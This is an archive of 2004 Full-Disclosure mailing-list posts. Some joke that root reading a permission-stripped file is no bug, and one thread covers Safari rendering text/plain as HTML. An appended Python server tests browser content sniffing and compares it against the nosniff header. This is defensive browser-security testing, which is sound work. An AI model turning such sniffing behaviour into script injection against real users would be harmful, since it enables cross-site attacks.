> cat: hax: Permission denied
> [EMAIL PROTECTED] h4x0r $ sudo cat hax
> bipin sucks
> [EMAIL PROTECTED] h4x0r $

Chris - it's worse than we thought.  Looks like EXT3 suffers the same
problem:

[EMAIL PROTECTED]:~> echo "4m cl3v4r" >> wtf
[EMAIL PROTECTED]:~> chmod -rwx wtf
[EMAIL PROTECTED]:~> ls -l wtf
--  1 jamesgr users 10 2004-08-23 12:01 wtf
[EMAIL PROTECTED]:~> su
Password:
gradius:/home/jamesgr # cat wtf
4m cl3v4r
gradius:/home/jamesgr #
Obviously they must both be derived from the same code.  An IBM employee 
has clearly contributed this code simultaneously to BSD (which Microsoft 
has innocently used) and Linux, copied from UNIX(R) source which SCO owns!

THE SKY IS FALLING!  Please don't hurt me SCO!
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Unsecure file permission of ZoneAlarm pro. (ZA will fail to load)

2004-08-23 Thread Chris Smith
On Mon, 23 Aug 2004 07:11, bipin gautam wrote:
> Not really, I've discovered a NTFS feature (BUG?).
> well... If you have system/administrative privileges
> in a disk you can read/modify a file even though
> it has "EVERYONE: DENY" permission set.

OMFG!! REISERFS HAS THE SAME EXPLOIT

CHECK OUT MY POC!

[EMAIL PROTECTED] h4x0r $ echo "bipin sucks" >> hax
[EMAIL PROTECTED] h4x0r $ chmod -rwx hax
[EMAIL PROTECTED] h4x0r $ ls -alo hax
--  1 chris 12 Aug 23 21:58 hax
[EMAIL PROTECTED] h4x0r $ cat hax
cat: hax: Permission denied
[EMAIL PROTECTED] h4x0r $ sudo cat hax
bipin sucks
[EMAIL PROTECTED] h4x0r $

Superuser means _SUPERUSER_ (or administrator).

Not a bug, not a feature. It just is.

Chris.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Safari/WebCore Content Sniffing

2004-08-23 Thread Nicob
On Sat 21/08/2004 at 17:44, fukami wrote:

> All other browsers I tested so far have the right behavior
> and treat plain text files as plain text files.

Old versions of Opera were doing "MIME sniffing" too. Apparently, the
problem is resolved in recent versions (tested on Opera 7.54).

Months ago I made a small CGI for testing browsers for HTML and
JavaScript interpretation with a text/plain content type:

http://nicob.net/cgi-bin/content-type.cgi

-- 
Nicob <[EMAIL PROTECTED]>

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
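The test Nicob describes is simple to reproduce: serve a body that contains HTML and script under a Content-Type of text/plain and see whether the browser under test displays the markup as text (correct) or renders it (content sniffing). The following is an added example, not Nicob's CGI and not from any of the quoted posts; the test body is constructed. It also serves a second URL carrying X-Content-Type-Options: nosniff, the server-side opt-out of sniffing that browsers adopted later (an assumption on top of the 2004 discussion, included as the mitigation a defender would compare against), so the two responses can be checked side by side in the same browser.

```python
import http.server
import sys

# Constructed test payload: HTML markup and a harmless script, to be served
# with a Content-Type that declares it plain text. A browser honouring the
# header shows the tags literally; one that sniffs the body renders the
# heading and the title changes to "sniffed".
TEST_BODY = (
    b"<html><body><h1>content-type test</h1>\n"
    b"<p>If this renders as a heading, the browser ignored text/plain.</p>\n"
    b"<script>document.title = 'sniffed';</script>\n"
    b"</body></html>\n"
)


def build_response_headers(nosniff):
    """Headers for the test response. Content-Type deliberately says
    text/plain although the body is HTML. With nosniff=True the
    X-Content-Type-Options header (later standardised; assumed here as the
    defender's mitigation) asks the browser to trust the declared type."""
    headers = {
        "Content-Type": "text/plain; charset=utf-8",
        "Content-Length": str(len(TEST_BODY)),
    }
    if nosniff:
        headers["X-Content-Type-Options"] = "nosniff"
    return headers


def serialize_response(nosniff):
    """The complete HTTP/1.1 response as bytes, useful for inspecting exactly
    what the browser receives or for replaying it over a raw socket."""
    head = "HTTP/1.1 200 OK\r\n"
    head += "".join(f"{k}: {v}\r\n" for k, v in build_response_headers(nosniff).items())
    head += "\r\n"
    return head.encode("ascii") + TEST_BODY


class ContentTypeTestHandler(http.server.BaseHTTPRequestHandler):
    """GET /         -> text/plain with an HTML body (sniffing test)
       GET /nosniff  -> same body plus X-Content-Type-Options: nosniff"""

    def do_GET(self):
        self.send_response(200)
        for name, value in build_response_headers(self.path.startswith("/nosniff")).items():
            self.send_header(name, value)
        self.end_headers()
        self.wfile.write(TEST_BODY)


if __name__ == "__main__":
    # Assumed usage: python content_type_test.py [port]; default port 8080.
    port = int(sys.argv[1]) if len(sys.argv) > 1 else 8080
    print(f"Open http://127.0.0.1:{port}/ and http://127.0.0.1:{port}/nosniff "
          f"in the browser under test; a correct browser shows raw tags on both.")
    http.server.HTTPServer(("127.0.0.1", port), ContentTypeTestHandler).serve_forever()
```

The expected result on a conforming browser is the raw markup displayed as text at both URLs; a browser that renders the heading at the first URL but not at the second is one that sniffs by default and honours the opt-out, while a browser that renders it at both is the case fukami and Nicob are describing.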